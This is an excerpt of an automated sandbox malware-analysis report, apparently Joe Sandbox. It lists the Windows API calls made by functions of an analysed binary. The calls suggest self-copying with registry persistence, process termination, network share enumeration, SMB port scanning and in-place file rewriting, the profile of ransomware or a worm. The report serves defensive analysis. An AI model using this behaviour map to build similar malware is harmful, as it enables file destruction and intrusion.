        • Part of subcall function 000D3A18: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 000D3A60
        • Part of subcall function 000D3A18: RegCloseKey.ADVAPI32(?), ref: 000D3A79
      • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 000D463C
      • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 000D464E
      • GetProcAddress.KERNEL32(00000000), ref: 000D4655
      • GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 000D46E1
      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 000D4737
      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 000D475F
      • WriteFile.KERNEL32(?,?,00000208,?,00000000,?,?,?,?,00000000), ref: 000D478B
      • FlushFileBuffers.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 000D47A3
      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 000D47AD
        • Part of subcall function 000D3EE1: GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 000D3F86
        • Part of subcall function 000D3EE1: GetProcAddress.KERNEL32(00000000), ref: 000D3F8F
        • Part of subcall function 000D3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3F98
        • Part of subcall function 000D3EE1: GetProcAddress.KERNEL32(00000000), ref: 000D3F9B
        • Part of subcall function 000D3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3FA4
        • Part of subcall function 000D3EE1: GetProcAddress.KERNEL32(00000000), ref: 000D3FA7
        • Part of subcall function 000D3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3FB0
        • Part of subcall function 000D3EE1: GetProcAddress.KERNEL32(00000000), ref: 000D3FB3
        • Part of subcall function 000D3EE1: GetCurrentProcessId.KERNEL32 ref: 000D3FE6
        • Part of subcall function 000D3EE1: OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 000D3FF3
        • Part of subcall function 000D4325: CoInitializeEx.OLE32(00000000,00000006,?,74DF35B0,00000208,00000000,000D47D7,?,00000000,?), ref: 000D437F
        • Part of subcall function 000D4325: CoUninitialize.OLE32(?,?,?,?,?,?,74DF35B0,00000208,00000000,000D47D7), ref: 000D43B5
        • Part of subcall function 000D3E9E: ShellExecuteExW.SHELL32(?), ref: 000D3ED9
      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,00000000), ref: 000D47FA
      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000D4824
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$AddressFileModuleProc$Process$CloseCurrentOpenWrite$BuffersCreateDeleteExecuteFlushInformationInitializeObjectQueryShellSingleUninitializeValueVersionVolumeWait
      • String ID:
      • API String ID: 3832649910-0
      • Opcode ID: 77f986429faa44a872acadcc7fbc5c84c6ef8813751a2b7dc3c6a427b50c67d2
      • Instruction ID: ded2d62e7144e9ae477e103218d1b9fceaf0fe6df10e981de97e376b50aec3df
      • Opcode Fuzzy Hash: 77f986429faa44a872acadcc7fbc5c84c6ef8813751a2b7dc3c6a427b50c67d2
      • Instruction Fuzzy Hash: 999162B2508341AFD710AF60DC85A9FBBE8EF84350F00092FF58592252EB75CA149B73
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D1236 Relevance: 15.3, APIs: 10, Instructions: 287fileregistryCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
        • Part of subcall function 000D5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,000D5B3B,00000000,00000000,00000000,000D37EB,00000000), ref: 000D5B19
      • CopyFileW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000D137E
      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,?), ref: 000D13A9
      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020106,?), ref: 000D13EF
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 000D1444
      • GetFileAttributesW.KERNEL32(00000000), ref: 000D144B
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 000D145B
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 000D14A8
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 000D14CB
      • GetFileAttributesW.KERNEL32(00000000), ref: 000D14D2
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 000D14E2
        • Part of subcall function 000D3A93: RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,000D1408,?,00000104,?,000D1408,00000000,00000000), ref: 000D3AA6
        • Part of subcall function 000D3A93: RegCloseKey.ADVAPI32(?,?,000D1408,00000000,00000000), ref: 000D3AB2
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$AttributesCopy$HeapOpen$AllocCloseModuleNameProcessValue
      • String ID:
      • API String ID: 255945531-0
      • Opcode ID: b59d60305a13f1393579035edeed9136643b691c0fb8ed0316ce16e43ef27b7e
      • Instruction ID: 7989a056c55c08e45e64937fb87b2e2d47023701d338286434ab981706493b84
      • Opcode Fuzzy Hash: b59d60305a13f1393579035edeed9136643b691c0fb8ed0316ce16e43ef27b7e
      • Instruction Fuzzy Hash: 5C914171D00309BEEF116BA4EC46BEEBBB9EF45321F200017F505B5292DB759E509A71
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D77DF Relevance: 15.1, APIs: 10, Instructions: 54timethreadCOMMON
      Download Yara Rule
      APIs
      • InitializeCriticalSectionAndSpinCount.KERNEL32(000DD6A0,00000FA0,00000000,00000000,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D77F2
      • EnterCriticalSection.KERNEL32(000DD6A0,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D77F9
      • QueryPerformanceCounter.KERNEL32(000D17C2,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D7809
      • GetTickCount.KERNEL32 ref: 000D780B
      • GetCurrentProcessId.KERNEL32(?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D7829
      • GetCurrentThreadId.KERNEL32 ref: 000D7835
      • GetLocalTime.KERNEL32(?,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D7845
      • SystemTimeToFileTime.KERNEL32(?,00000000,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D7853
      • QueryPerformanceCounter.KERNEL32(000D17C2,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D786F
      • LeaveCriticalSection.KERNEL32(000DD6A0,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D7899
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSectionTime$CountCounterCurrentPerformanceQuery$EnterFileInitializeLeaveLocalProcessSpinSystemThreadTick
      • String ID:
      • API String ID: 1260023459-0
      • Opcode ID: 4a7b0c366028093d0c0d68e5d9b62ae32c8110a0db55761aa8c765e5906233fc
      • Instruction ID: 355109d011f7d89fef0b5c52415464b6a59f5861aee495031de9f0a09d26803f
      • Opcode Fuzzy Hash: 4a7b0c366028093d0c0d68e5d9b62ae32c8110a0db55761aa8c765e5906233fc
      • Instruction Fuzzy Hash: 4411D6719022089FEB00DBB4ED49A8E7BF8FF0D301B420427E90AD2160D73C95449FB2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D4DEE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65processCOMMON
      Download Yara Rule
      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000D4E00
      • Process32FirstW.KERNEL32(Q#,?), ref: 000D4E38
      • OpenProcess.KERNEL32(00000001,00000000,?,00000000,?,?,?), ref: 000D4E68
      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 000D4E76
      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 000D4E7F
      • Process32NextW.KERNEL32(?,?), ref: 000D4E8E
      • CloseHandle.KERNEL32(?,?,?,?), ref: 000D4E9C
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
      • String ID: Q#
      • API String ID: 2696918072-1378326089
      • Opcode ID: 0b102eba9774613decf4c896ba4290ecd8c6b0146ce1b98ea5c619e7cb8e0e3f
      • Instruction ID: a7bb75f8bf3fd45934336a42514615251fa5a267a41b88873bbfb8bd6af0cf85
      • Opcode Fuzzy Hash: 0b102eba9774613decf4c896ba4290ecd8c6b0146ce1b98ea5c619e7cb8e0e3f
      • Instruction Fuzzy Hash: 9A115175A01319BFDB10ABA5DC88ADEBBBCEF49714F1000A6E904E2250D7749E45CAB1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D1E10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205shareCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 000D1E66
      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 000D1E83
        • Part of subcall function 000D5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,000D2E54), ref: 000D596A
        • Part of subcall function 000D5962: LeaveCriticalSection.KERNEL32(?), ref: 000D5973
      • WNetEnumResourceW.MPR(?,?,?,?), ref: 000D2046
      • WNetCloseEnum.MPR(?), ref: 000D205E
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Enum$CriticalHeapResourceSection$AllocCloseEnterLeaveOpenProcess
      • String ID: \\?\UNC\\\e-
      • API String ID: 3929263231-4184602625
      • Opcode ID: ae07674ea611144740b074433ef4f2a9b66b7ff096b47961c587cac15d84ca79
      • Instruction ID: 0cde50cece935838c0b8be18b043e76bf27a4f3a46bdaf6fbabf3ee7c3cd90e0
      • Opcode Fuzzy Hash: ae07674ea611144740b074433ef4f2a9b66b7ff096b47961c587cac15d84ca79
      • Instruction Fuzzy Hash: 4D61DF72204301AFDB21AF24DC45AAB7BE9EF94310F04092AF954D6363EB31D955CB72
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D8C42 Relevance: 12.2, APIs: 8, Instructions: 207fileCOMMON
      Download Yara Rule
      APIs
      • MoveFileW.KERNEL32(?,?), ref: 000D8CD3
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 000D8CF1
      • SetFilePointerEx.KERNEL32(00000001,?,?,?,00000002), ref: 000D8E3F
      • WriteFile.KERNEL32(00000001,?,?,?,00000000), ref: 000D8E59
      • SetEndOfFile.KERNEL32(00000001), ref: 000D8E6F
        • Part of subcall function 000D8AF1: SetFilePointerEx.KERNEL32(?,00000000,?,?,00000000), ref: 000D8B28
        • Part of subcall function 000D8AF1: WriteFile.KERNEL32(?,?,00040000,?,00000000), ref: 000D8B3F
      • FlushFileBuffers.KERNEL32(00000001), ref: 000D8E8E
      • CloseHandle.KERNEL32(?), ref: 000D8E9E
      • MoveFileW.KERNEL32(?,?), ref: 000D8EB0
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$MovePointerWrite$BuffersCloseCreateFlushHandle
      • String ID:
      • API String ID: 4283038262-0
      • Opcode ID: 004537327b5b9e0a33982c82c9cee4f1a8d0ea6783c3b9766819a184d91acb42
      • Instruction ID: 7e091922901eec9f906959c782a6ca85cc82641d998ab4966ad8ba2c24ce3517
      • Opcode Fuzzy Hash: 004537327b5b9e0a33982c82c9cee4f1a8d0ea6783c3b9766819a184d91acb42
      • Instruction Fuzzy Hash: 2B716DB1A00309AFDF119FA4DC45BEE7BB9BF08300F04852AF905E6251EB75AA54CF61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D8EBE Relevance: 12.1, APIs: 8, Instructions: 86fileCOMMON
      Download Yara Rule
      APIs
      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8ED8
      • GetFileSizeEx.KERNEL32(00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8EEE
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8EFD
      • GetFileAttributesW.KERNEL32(?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8F1B
      • SetFileAttributesW.KERNEL32(?,00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8F3C
        • Part of subcall function 000D8782: GetFileAttributesW.KERNEL32(?), ref: 000D87F3
        • Part of subcall function 000D8782: GetFileAttributesW.KERNEL32(?), ref: 000D8816
        • Part of subcall function 000D8782: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 000D8835
        • Part of subcall function 000D8782: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 000D885C
        • Part of subcall function 000D8782: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000D888C
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 000D8F8F
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 000D8F94
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8F9C
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$Attributes$CloseCreateHandlePointer$Size
      • String ID:
      • API String ID: 3440144462-0
      • Opcode ID: 3bbb344b81a1ca0b926ee004335d0bdd80088eb67b8b87857666c885bf8fd416
      • Instruction ID: 5721a372e2af54763c91a378066009306fe1e5248dd4c71123b1c1454d85aa21
      • Opcode Fuzzy Hash: 3bbb344b81a1ca0b926ee004335d0bdd80088eb67b8b87857666c885bf8fd416
      • Instruction Fuzzy Hash: 62314D70A01309BFDF159FA4DC84ABE7BB9EF05320F14852AF925A2390DB348E549B71
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D242F Relevance: 12.1, APIs: 8, Instructions: 64threadsleepsynchronizationCOMMON
      Download Yara Rule
      APIs
      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,000D2C15), ref: 000D2444
      • CreateThread.KERNEL32(00000000,00000000,000D454B,00000000,00000000,00000000), ref: 000D245A
        • Part of subcall function 000D4F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,000D2C6F,00000001), ref: 000D4F95
        • Part of subcall function 000D4F7A: CloseHandle.KERNEL32(?,?,000D2C6F,00000001), ref: 000D4F9E
      • Sleep.KERNEL32(00000064), ref: 000D2472
      • SetEvent.KERNEL32(00000000), ref: 000D2486
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D2495
      • GetExitCodeThread.KERNEL32(?,?), ref: 000D24A4
      • CloseHandle.KERNEL32(00000000), ref: 000D24B1
      • CloseHandle.KERNEL32(?), ref: 000D24B8
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CreateEventThread$CodeExitMutexObjectReleaseSingleSleepWait
      • String ID:
      • API String ID: 2313513115-0
      • Opcode ID: 03bfa00229dd38d6eaee87d83a3a014705709ca548860397d17a5c08f125d407
      • Instruction ID: 455383f840d22e675490a244de09cf6fe0522e65c91d97d46caae728f2fa24eb
      • Opcode Fuzzy Hash: 03bfa00229dd38d6eaee87d83a3a014705709ca548860397d17a5c08f125d407
      • Instruction Fuzzy Hash: 8511C435A01314BBE720ABA69C88EAFBFBCEBC6B51F104157FD11A2290D7784900CA71
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D5376 Relevance: 9.0, APIs: 6, Instructions: 47synchronizationCOMMON
      Download Yara Rule
      APIs
      • LeaveCriticalSection.KERNEL32(000D1D91,?,000D1D81,00000000,?,?,?,?), ref: 000D5387
      • WaitForSingleObject.KERNEL32(74FF2274,000000FF,?,000D1D81,00000000,?,?,?,?), ref: 000D5392
      • EnterCriticalSection.KERNEL32(000D1D91,000D1D81,00000000,00000000,000D58E8,?,?,00000000,?,?,000D1D81,00000000,?,?,?,?), ref: 000D539D
      • ResetEvent.KERNEL32(77FF1024,?,000D1D81,00000000,?,?,?,?), ref: 000D53B3
      • ResetEvent.KERNEL32(2474FF22,?,000D1D81,00000000,?,?,?,?), ref: 000D53CA
      • LeaveCriticalSection.KERNEL32(000D1D91,?,000D1D81,00000000,?,?,?,?), ref: 000D53D9
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeaveReset$EnterObjectSingleWait
      • String ID:
      • API String ID: 622437971-0
      • Opcode ID: b1124421c609ecd7e2045fdfa1d3d8ea6e9dae74d8c26cefc9df4a43312a5361
      • Instruction ID: c8ed6d61d34f73806a295243dbb2cc6d9e15dc9a613be5f0689af519032a10bd
      • Opcode Fuzzy Hash: b1124421c609ecd7e2045fdfa1d3d8ea6e9dae74d8c26cefc9df4a43312a5361
      • Instruction Fuzzy Hash: 02011A71201B119BE7205B29DD40916BBF9EF117A23214A2BECA6D2660D7B4ED019BB1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D5230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 000D525F
      • htonl.WS2_32(00000004), ref: 000D527C
      • htonl.WS2_32(00000004), ref: 000D5287
      • htonl.WS2_32(?), ref: 000D528E
        • Part of subcall function 000D5067: htons.WS2_32(000001BD), ref: 000D5085
        • Part of subcall function 000D5067: htonl.WS2_32(00000000), ref: 000D50DB
        • Part of subcall function 000D5067: socket.WS2_32(00000002,00000001,00000006), ref: 000D50EC
        • Part of subcall function 000D5067: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 000D5102
        • Part of subcall function 000D5067: connect.WS2_32(00000000,?,00000010), ref: 000D5113
        • Part of subcall function 000D5067: WSAGetLastError.WS2_32 ref: 000D511D
        • Part of subcall function 000D5067: getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 000D517C
        • Part of subcall function 000D5067: recv.WS2_32(?,?,00000001,00000002), ref: 000D5195
        • Part of subcall function 000D5067: WSAGetLastError.WS2_32 ref: 000D51A2
        • Part of subcall function 000D5067: getpeername.WS2_32(?,?,?), ref: 000D51C9
        • Part of subcall function 000D5067: closesocket.WS2_32(?), ref: 000D51E3
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: htonl$ErrorHeapLast$AddrAllocProcessTableclosesocketconnectgetpeernamegetsockopthtonsioctlsocketrecvsocket
      • String ID: w"
      • API String ID: 1223028931-2013044058
      • Opcode ID: 5711ba3b6bd537a845fff8e22635db1505d6c0d68f3b52569e02f127f21bfa49
      • Instruction ID: b939c7def060381adabdeca3a4df326f25bf67156da30742d63f41c98f7eec33
      • Opcode Fuzzy Hash: 5711ba3b6bd537a845fff8e22635db1505d6c0d68f3b52569e02f127f21bfa49
      • Instruction Fuzzy Hash: C411D071600315AFDB10AF68CC858AABBE8FB49356F10092BF888C2312D635D959CBF1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D32A6 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
      Download Yara Rule
      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,000D339F), ref: 000D32AB
      • DeleteCriticalSection.KERNEL32(0000000C,?,000D339F), ref: 000D32B2
      • CloseHandle.KERNEL32(00000000,?,000D339F), ref: 000D32C5
      • CloseHandle.KERNEL32(?,?,000D339F), ref: 000D32CF
      • CloseHandle.KERNEL32(?,?,000D339F), ref: 000D32D9
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$DeleteEnter
      • String ID:
      • API String ID: 622934417-0
      • Opcode ID: 59dd3b46073556fe3fc074a678ac42059a8bab9b59674b2c41514448120ec279
      • Instruction ID: 12d09391e1a4c5ad6ab1c9cfc604e29b0c621c60d4209d3432d0ce26f549633d
      • Opcode Fuzzy Hash: 59dd3b46073556fe3fc074a678ac42059a8bab9b59674b2c41514448120ec279
      • Instruction Fuzzy Hash: 4AF03A327003005FA6A0AB69EC8993BB7ECAF95B10315080FF845D3651DB69F9428A72
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D33C5 Relevance: 7.5, APIs: 5, Instructions: 18COMMON
      Download Yara Rule
      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,00000000,000D57AF), ref: 000D33CB
      • SetEvent.KERNEL32(?), ref: 000D33DE
      • SetEvent.KERNEL32(00000000), ref: 000D33E2
